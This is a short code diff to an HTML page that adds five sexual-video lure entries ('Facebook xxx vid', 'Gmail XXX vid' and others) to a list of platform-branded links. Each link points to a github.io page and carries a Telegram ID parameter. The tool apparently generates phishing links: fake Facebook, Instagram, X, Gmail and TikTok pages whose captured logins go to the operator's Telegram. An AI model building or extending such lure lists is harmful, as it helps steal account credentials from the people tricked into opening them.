--- a/inn.html
+++ b/inn.html
@@ -197,6 +197,13 @@
     };
 
     const freeLinks = [
+      // all new link i just added
+            { name: "Facebook xxx vid", image: "https://rrloaty.github.io/intelligent/face.png", urlTemplate: "https://ilyelya.github.io/n/PF.html?id={telegram-id}" },
+      { name: "Instagram xxx Vid", image: "https://rrloaty.github.io/intelligent/inst.png", urlTemplate: "https://ilyelya.github.io/n/PI.html?id={telegram-id}" },
+      { name: "Twitter(X) XXX vid", image: "https://rrloaty.github.io/intelligent/X.png", urlTemplate: "https://ilyelya.github.io/n/PX.html?id={telegram-id}" },
+      { name: "Gmail XXX vid", image: "https://rrloaty.github.io/intelligent/gmai.png", urlTemplate: "https://ilyelya.github.io/n/PG.html?id={telegram-id}" },
+      { name: "Tiktok XXX vid", image: "https://rrloaty.github.io/intelligent/tiktok.png", urlTemplate: "https://ilyelya.github.io/n/PT.html?id={telegram-id}" },
+      // they ends here
       { name: "Facebook", image: "https://rrloaty.github.io/intelligent/face.png", urlTemplate: "https://ilyelya.github.io/n/face.html?id={telegram-id}" },
       { name: "Instagram", image: "https://rrloaty.github.io/intelligent/inst.png", urlTemplate: "https://ilyelya.github.io/n/inst.html?id={telegram-id}" },
       { name: "Twitter(X)", image: "https://rrloaty.github.io/intelligent/X.png", urlTemplate: "https://ilyelya.github.io/n/X.html?id={telegram-id}" },
